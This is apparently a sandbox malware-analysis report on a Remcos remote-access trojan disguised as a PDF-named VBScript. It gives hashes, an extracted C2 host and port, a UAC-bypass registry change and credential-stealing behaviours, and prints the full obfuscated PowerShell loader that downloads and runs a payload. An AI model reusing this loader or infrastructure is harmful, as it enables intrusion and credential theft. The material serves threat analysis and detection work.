remcos | eb88df06fa2f93f3615a04a593ff0c88098a6e4a9d0063dc3cfbd8931f0e625e

Analysis

max time kernel
147s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-11-2024 09:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Document BT24·pdf.vbs
Size

86KB
MD5

acd9a75b2f33064da7ebef088ed16cb9
SHA1

8f51e47a0454c8032e2ecd90f85bb115e80b5f35
SHA256

cecb613e2e7877b680323862198f05c9634c1dc3e7c64ed95cc3154e9c5e9fd4
SHA512

06525377cfdc4e75fab11fd907a65c611bb9c880fe56bc68b3baa108b266e472813d3824969d6e6584c6b7d90b65379dfc633a15ef17bf24705a8195a5c657b3
SSDEEP

1536:970ty9v0kvBGd9pOpuoNvhvJELsj+qOhkqXzkx5c3cYdg51VWXaAj2yTk:9Qk9vh5U9QLzFOhbwx5c3cYdqVWrTk

Score

10^/10

remcos remotehost collection credential_access discovery evasion rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

dvlqrd8dhs.duckdns.org:46063

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-0IGFAQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/2412-84-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1780-91-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1676-87-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/1780-91-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/2412-84-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	process
4	2836	WScript.exe
8	4888	powershell.exe
12	4888	powershell.exe
24	2332	msiexec.exe
26	2332	msiexec.exe
28	2332	msiexec.exe
30	2332	msiexec.exe
31	2332	msiexec.exe
34	2332	msiexec.exe
37	2332	msiexec.exe
38	2332	msiexec.exe
39	2332	msiexec.exe
41	2332	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

msedge.exemsedge.exemsedge.exeChrome.exeChrome.exeChrome.exeChrome.exemsedge.exemsedge.exe

pid process

2384 msedge.exe
548 msedge.exe
1748 msedge.exe
4300 Chrome.exe
4308 Chrome.exe
3280 Chrome.exe
4024 Chrome.exe
1396 msedge.exe
4836 msedge.exe

pid	process
2384	msedge.exe
548	msedge.exe
1748	msedge.exe
4300	Chrome.exe
4308	Chrome.exe
3280	Chrome.exe
4024	Chrome.exe
1396	msedge.exe
4836	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

7 drive.google.com
8 drive.google.com
24 drive.google.com
Network Service Discovery 1 TTPs 2 IoCs
Attempt to gather information on host's network.
discovery

Network Service Discovery
T1046

Processes:

powershell.exepowershell.exe

pid process

532 powershell.exe
4888 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid process

2332 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid process

532 powershell.exe
2332 msiexec.exe

flow	ioc
7	drive.google.com
8	drive.google.com
24	drive.google.com

pid	process
532	powershell.exe
4888	powershell.exe

pid	process
2332	msiexec.exe

pid	process
532	powershell.exe
2332	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	process	target process
PID 2332 set thread context of 2412	2332	msiexec.exe	msiexec.exe
PID 2332 set thread context of 1780	2332	msiexec.exe	msiexec.exe
PID 2332 set thread context of 1676	2332	msiexec.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exemsiexec.exemsiexec.exemsiexec.exepowershell.exemsiexec.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3124 reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
3124	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exeChrome.exe

pid	process
4888	powershell.exe
4888	powershell.exe
532	powershell.exe
532	powershell.exe
532	powershell.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2412	msiexec.exe
2412	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
1676	msiexec.exe
1676	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2412	msiexec.exe
2412	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
4300	Chrome.exe
4300	Chrome.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exemsiexec.exe

pid process

532 powershell.exe
2332 msiexec.exe
2332 msiexec.exe
2332 msiexec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

2384 msedge.exe
2384 msedge.exe
2384 msedge.exe
2384 msedge.exe

pid	process
532	powershell.exe
2332	msiexec.exe
2332	msiexec.exe
2332	msiexec.exe

pid	process
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe
2384	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	process
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeDebugPrivilege	1676	msiexec.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe
Token: SeShutdownPrivilege	4300	Chrome.exe
Token: SeCreatePagefilePrivilege	4300	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Chrome.exemsedge.exe

pid process

4300 Chrome.exe
2384 msedge.exe
2384 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid process

2332 msiexec.exe

pid	process
4300	Chrome.exe
2384	msedge.exe
2384	msedge.exe

pid	process
2332	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exeChrome.exe

description	pid	process	target process
PID 2836 wrote to memory of 4888	2836	WScript.exe	powershell.exe
PID 2836 wrote to memory of 4888	2836	WScript.exe	powershell.exe
PID 532 wrote to memory of 2332	532	powershell.exe	msiexec.exe
PID 532 wrote to memory of 2332	532	powershell.exe	msiexec.exe
PID 532 wrote to memory of 2332	532	powershell.exe	msiexec.exe
PID 532 wrote to memory of 2332	532	powershell.exe	msiexec.exe
PID 2332 wrote to memory of 948	2332	msiexec.exe	cmd.exe
PID 2332 wrote to memory of 948	2332	msiexec.exe	cmd.exe
PID 2332 wrote to memory of 948	2332	msiexec.exe	cmd.exe
PID 948 wrote to memory of 3124	948	cmd.exe	reg.exe
PID 948 wrote to memory of 3124	948	cmd.exe	reg.exe
PID 948 wrote to memory of 3124	948	cmd.exe	reg.exe
PID 2332 wrote to memory of 4300	2332	msiexec.exe	Chrome.exe
PID 2332 wrote to memory of 4300	2332	msiexec.exe	Chrome.exe
PID 4300 wrote to memory of 4548	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 4548	4300	Chrome.exe	Chrome.exe
PID 2332 wrote to memory of 2412	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 2412	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 2412	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 2412	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1780	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1780	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1780	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1780	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1676	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1676	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1676	2332	msiexec.exe	msiexec.exe
PID 2332 wrote to memory of 1676	2332	msiexec.exe	msiexec.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 1264	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 2088	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 2088	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 4720	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 4720	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 4720	4300	Chrome.exe	Chrome.exe
PID 4300 wrote to memory of 4720	4300	Chrome.exe	Chrome.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#electrophotometry Shadoofs Kannibalismen Unarboured Sknserklringens Aequian #><#Encipher Gangliecelles Beordret Flatterous tetracene Rvturene Flyveres #>$Recrowns='consultor';function Outdoor($Doundake){If ($host.DebuggerEnabled) {$limosella++;$pappiferous=$Doundake.'Length' - $limosella} for ( $presubordination=4;$presubordination -lt $pappiferous;$presubordination+=5){$Kloroformens84=$presubordination;$Spicae+=$Doundake[$presubordination]}$Spicae}function Correality69($Dissiderende){ .($Fejltest) ($Dissiderende)}$Kattehjemmet=Outdoor 'NoninCleieSalptUnin.HomoWSk.lEal,eb andC,kolLSporI kinENicknG ugtG no ';$Scorpiurus=Outdoor ' utoMSe.loUhyrzAfbriUnsol onbl VrdaI vi/ nv ';$Politicness=Outdoor 'MogoTDendlBoplsNo i1Affo2obsk ';$prveperiode=' Mit[SporN KalELiveT L g. Rads U bEErogr Undv BrnIShanc Cone ouP El,oTilbi ParNTovat EleMInteAFor.nAfreA NonGC rreE loR ymm]Blue:G it: NizSHjopE igncAndouJ anrmusiisel TS veyTor P epiROveroBonbtF amoVinicB edObaktlApro=R dd$ ForpBeduoRadilF.asiAenetC ari TheCLi dn OmfEFr ms GedsBort ';$Scorpiurus+=Outdoor 'Unde5Ails.Plat0St,n Pemm( oncWUn uiSeminE sedCarboYammwenepsOppo UpchNGuveTbo,i W l1 ans0 f l. Ern0Impe;Vare nonpW PariFejlnt,tr6Br.t4Stil; afs AfskxIndi6 E,t4dumm; Lun Spi rLnfrvperp:erhv1Plag3 d,d1Pror.Ki e0fyld)Brne TactGjagte Sjlc Ar k Taxo.icr/ cou2,vin0 ,il1Kalc0C,um0 Brd1Rubu0Enke1Kims OverFSor.iPa.arSk.neSkorfFlooounflx Oth/L,pi1Prim3maeg1 alk.Unde0Dobb ';$Deklasseringers=Outdoor ' niuFitnSDiffeHellrSlyn- So a hirgGaliE Ca nMan T ft ';$Informalities=Outdoor 'Vir h A ttFor tPantpErhvssin.:Irre/Vint/NonedGerarF siiRe hv one Mor. Thig esodatooA,digLuftl ManeDeso.H,rrc GraoKarimB vi/Misruvildc ffa? So eVigixLaugpSrmro O.er ammtLabi= MegdDisroCianwIsranNon lcrapoFriha esidOpla& Tori Ov dFi.g= E o1colonsa,d9 ordlKundl P vn FeslStimzunsteCa ioP ep0EfteL TilS Opl0,aeloF av9Matf8 fl,P artJBirtLBugb1Esse-,gglRNiog1F,nkQLadejStveXBlrefTittzBegreErstObesi2Don,_Ma i ';$Vidneafhringernes=Outdoor ' Sp,>Goek ';$Fejltest=Outdoor 'SkumICa seStj xun o ';$Zygal='Backupfil';$Unheretical='\Nedrykke.Fon';Correality69 (Outdoor 'Gram$BremGYel.lGtepoTrihb rgeaPrioLOutr:AcroSMet kPotay C cTFirmLrateELev RSnak=Mpso$TaphEO,ypnT buv Sam:St aANglePNdj pParrDBaita KantByggAVsel+ Rep$ RevUOctonPrephBlanEUrger,pice enTPacii SagCDemeaObo,lDe,i ');Correality69 (Outdoor 'Kamb$ LnsGFiraLQu,doNickBInmeAAn ilS am:UnenuFlleDRad.SOv rTBestYTa,kK Pagn FanidessnEndogAsynsEkstOCe tmDiskrPre a ,adaLnind eleV spT.kspSNeat=anis$BogaICedenSolvFBar,oN,naRPl em rigaSufilTrieiSte TBov iWardENoddS.dda.CevisN rdp sselSkanI verT ,ri( ,et$MarkVMastiLob,d C.rn SpieraadA Fo.FCha hP,rarvrn.iVrnenNausGSenteProvrCas.NAng,E SynSRetu)Yird ');Correality69 (Outdoor $prveperiode);$Informalities=$Udstykningsomraadets[0];$aarvaagen=(Outdoor 'Macr$,retGLendlHumbO UnaBm scAbronlBi d:Hstea Me LAngrTSjakeThisrGaddN Co,aS emrF,lmiOboea Voc=DynenBilfE SunWAtri-TummOCe.lb LamJK,imESitocN ddTR to Abmhs Pery ,lis KonTProtE,eriMP iu.,oop$Uns.kJuleaH altScooTD.arE FraHT neJP ole Demm Pr,mHad EBi ntGuld ');Correality69 ($aarvaagen);Correality69 (Outdoor 'Hypn$Sk.laKommlQue tSexteLapir ornNedgaHip.rMa si UndaNrhe.SomaH,edoeFun,aRobad D,ne nterIncos Gue[Anim$ SanDrod eGrilkMa rlFrihaOp as FibsCoale T or uti ytnS.rigNoneeAxiarPremsFae ] Sla=F nd$FalsS Valc C moO.hor Es.pSkoviAfs uOenir riguKul sTage ');$Konversabel=Outdoor 'Un e$CollaSi,dlA det PreeTangrWo,kn Orda CourTi,bi Cluasneg. C sDTeoro FilwT rtn aml rctoWeataCassd MisFhandiinddlpandeRetr( egr$ rofIIndin latf CheoSickrVarpmolieaU jvlPro iC mmtMadeiLaureRos.sKrei,Unmo$ SnaASprec SmoiFlagd ConyDeni).eks ';$Acidy=$Skytler;Correality69 (Outdoor 'Wist$h,etGDuruLFor o ontB CowA,mpiLFrow:RullsIsohMshifaLuftADaabEDozeLIlanE eklKVejbtVisur U eoMagnnTjreIlis KUnde=Li n(D nsTHeadEGletsEye tFlin-NugaPWrotAOpvetregiHVogi Rud $.jtia apsc onoi PildDkfaymem )Ejef ');while (!$Smaaelektronik) {Correality69 (Outdoor 'Kegl$yodegKalkl ModoSkrtbAbceaStril Reg:SideF asso turr SchbKikkr HepuKahagDecoeOp,utVi dsNerv=suba$RolltBedrrEr ku FroeAbso ') ;Correality69 $Konversabel;Correality69 (Outdoor ' ResSSeritNeurALoc rSoret Sky-GlumSY,llL RocEAlleERer P Pom Unse4Over ');Correality69 (Outdoor 'Ser $ BlugNippL ObjOSyvmbReplaUndelBet.: eleS.oremNe,va Co aUndieTr eLKaryEAllak AdsTBoo RDra,oJa snreceIFritk Fau= Red( Witt SkyESchiSRoteT,rov-Se iPFa.oaVa itPo uh .er ua$milsAbrugC iteILredD TykyDrom)Udv ') ;Correality69 (Outdoor 'Rens$SnregS,ntLRdnsOBa gbUnknA ForLSo i:QuadmBjerOHippM NoseNereNle,sTSt eS Ple=R nn$AcergbuttLFid,ONegaBVulkASpisl Dkk:DartB.culL FigA To aSkaimGodfEthinj Ants La e Do +Op,r+ moo%Dru $ReseUeft dRefoSZaratTr,fYStylk SylnsklriTrbeNB ddgMellsC siobackMB flrUns aGabba ityDGuv,e ,nstVrkeSbesl. F rCBronoTageuSufinPagatGenn ') ;$Informalities=$Udstykningsomraadets[$Moments]}$Landboforeningerne=309803;$presubordinationnterschool=30529;Correality69 (Outdoor 'Whit$SainG eoL reaODisoBTempa.etoLKomm:ResebUndelFriliGa.rKAr mkBurme cieSerem tn=taxl Ba.ig IndE a,st ism- c,nc JouOAmbinBedsTsangEnedknFuppTAnal C.ec$,omfA,rocCalu iSystDAb rYMidd ');Correality69 (Outdoor 'Misc$Slukg ForlSprooBearb M daLaurlLayo:S ksCnonphS.mirUndeoCenon ga oAutomSgeraOzons Af.tEsmai Nskx cyl ,ono=Jdek mil[BaraS emiy .yrsGedetRyoteEngamU kn. Li.CstupoBli n In vDem eSailrF.istRfct]Piti:Wi.n: moeFCro r eosoSerimMandBJi gaUnsmsFor,eOpo 6Kapi4ExopSAflytTramr,ongiFor.nUnwrgUnde(Tu,i$ oveBKololAfskiProokHarekA pleKarasSpi.)Numi ');Correality69 (Outdoor 'ryma$ReacgSansL RgeOMystBUnfeA dbulUaf :Fr ts PigIPropDnonrEWeanTSpirAPraglUtyslForseLystR ovvKDo sePoleNSeksESvigr,legNMorgEMechSRepa4 Aar0Vini Sted=Fern ,ngo[ChassTeleyL jrs BroTAyene ritmRe.d. Ta,tt.iaEMundXC.pit D m.Cl geGlimNRotecHalvOHanddDowni FreNAffag orm] edl: tri:KonfAgla.sFul cIndpIViv IEnam.Dokug S gETas tEmirsHydrTExtrR A li ronOnomgAm t(Tuds$S avC aldhOmbrR UdvO CalNServO rfemY,ntAlinasMetaT ,ili Am xTo t) su ');Correality69 (Outdoor 'Vel $ makgE.silShojOUnsebSal A.rcalTrne:HoppYAnt OGarnnFrdin DetaOver1 Dif7Bien0 bib=.lve$Mis.SNo oiM.dddEkseeSkd,T Zw aKa slKompLBodoeUnivRU lbkTaeneHypoNPoineTsu rmen nMurrEAnsgSO dr4Nyan0tric.jernsAnthuFo dBfrynStweeT S.ar Rv,i AppnResoG Und(P,ln$RisalBespaEle.NVrdid,gnobFiltOBondfPenuo RevRSli.e KoaNTremIU,deN T.kg D,pEKierR By nVelse,ppe, rna$Elo,PMetaR Li e ,laSgra UautobSabboDesiR ahDSlabIfangnPartahagatWhipI AmeOFowlnTabin ki THaanE BesRAnkeS HilcSeptHGruno AvaOPyroLRe l)T ng ');Correality69 $Yonna170;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#electrophotometry Shadoofs Kannibalismen Unarboured Sknserklringens Aequian #><#Encipher Gangliecelles Beordret Flatterous tetracene Rvturene Flyveres #>$Recrowns='consultor';function Outdoor($Doundake){If ($host.DebuggerEnabled) {$limosella++;$pappiferous=$Doundake.'Length' - $limosella} for ( $presubordination=4;$presubordination -lt $pappiferous;$presubordination+=5){$Kloroformens84=$presubordination;$Spicae+=$Doundake[$presubordination]}$Spicae}function Correality69($Dissiderende){ .($Fejltest) ($Dissiderende)}$Kattehjemmet=Outdoor 'NoninCleieSalptUnin.HomoWSk.lEal,eb andC,kolLSporI kinENicknG ugtG no ';$Scorpiurus=Outdoor ' utoMSe.loUhyrzAfbriUnsol onbl VrdaI vi/ nv ';$Politicness=Outdoor 'MogoTDendlBoplsNo i1Affo2obsk ';$prveperiode=' Mit[SporN KalELiveT L g. Rads U bEErogr Undv BrnIShanc Cone ouP El,oTilbi ParNTovat EleMInteAFor.nAfreA NonGC rreE loR ymm]Blue:G it: NizSHjopE igncAndouJ anrmusiisel TS veyTor P epiROveroBonbtF amoVinicB edObaktlApro=R dd$ ForpBeduoRadilF.asiAenetC ari TheCLi dn OmfEFr ms GedsBort ';$Scorpiurus+=Outdoor 'Unde5Ails.Plat0St,n Pemm( oncWUn uiSeminE sedCarboYammwenepsOppo UpchNGuveTbo,i W l1 ans0 f l. Ern0Impe;Vare nonpW PariFejlnt,tr6Br.t4Stil; afs AfskxIndi6 E,t4dumm; Lun Spi rLnfrvperp:erhv1Plag3 d,d1Pror.Ki e0fyld)Brne TactGjagte Sjlc Ar k Taxo.icr/ cou2,vin0 ,il1Kalc0C,um0 Brd1Rubu0Enke1Kims OverFSor.iPa.arSk.neSkorfFlooounflx Oth/L,pi1Prim3maeg1 alk.Unde0Dobb ';$Deklasseringers=Outdoor ' niuFitnSDiffeHellrSlyn- So a hirgGaliE Ca nMan T ft ';$Informalities=Outdoor 'Vir h A ttFor tPantpErhvssin.:Irre/Vint/NonedGerarF siiRe hv one Mor. Thig esodatooA,digLuftl ManeDeso.H,rrc GraoKarimB vi/Misruvildc ffa? So eVigixLaugpSrmro O.er ammtLabi= MegdDisroCianwIsranNon lcrapoFriha esidOpla& Tori Ov dFi.g= E o1colonsa,d9 ordlKundl P vn FeslStimzunsteCa ioP ep0EfteL TilS Opl0,aeloF av9Matf8 fl,P artJBirtLBugb1Esse-,gglRNiog1F,nkQLadejStveXBlrefTittzBegreErstObesi2Don,_Ma i ';$Vidneafhringernes=Outdoor ' Sp,>Goek ';$Fejltest=Outdoor 'SkumICa seStj xun o ';$Zygal='Backupfil';$Unheretical='\Nedrykke.Fon';Correality69 (Outdoor 'Gram$BremGYel.lGtepoTrihb rgeaPrioLOutr:AcroSMet kPotay C cTFirmLrateELev RSnak=Mpso$TaphEO,ypnT buv Sam:St aANglePNdj pParrDBaita KantByggAVsel+ Rep$ RevUOctonPrephBlanEUrger,pice enTPacii SagCDemeaObo,lDe,i ');Correality69 (Outdoor 'Kamb$ LnsGFiraLQu,doNickBInmeAAn ilS am:UnenuFlleDRad.SOv rTBestYTa,kK Pagn FanidessnEndogAsynsEkstOCe tmDiskrPre a ,adaLnind eleV spT.kspSNeat=anis$BogaICedenSolvFBar,oN,naRPl em rigaSufilTrieiSte TBov iWardENoddS.dda.CevisN rdp sselSkanI verT ,ri( ,et$MarkVMastiLob,d C.rn SpieraadA Fo.FCha hP,rarvrn.iVrnenNausGSenteProvrCas.NAng,E SynSRetu)Yird ');Correality69 (Outdoor $prveperiode);$Informalities=$Udstykningsomraadets[0];$aarvaagen=(Outdoor 'Macr$,retGLendlHumbO UnaBm scAbronlBi d:Hstea Me LAngrTSjakeThisrGaddN Co,aS emrF,lmiOboea Voc=DynenBilfE SunWAtri-TummOCe.lb LamJK,imESitocN ddTR to Abmhs Pery ,lis KonTProtE,eriMP iu.,oop$Uns.kJuleaH altScooTD.arE FraHT neJP ole Demm Pr,mHad EBi ntGuld ');Correality69 ($aarvaagen);Correality69 (Outdoor 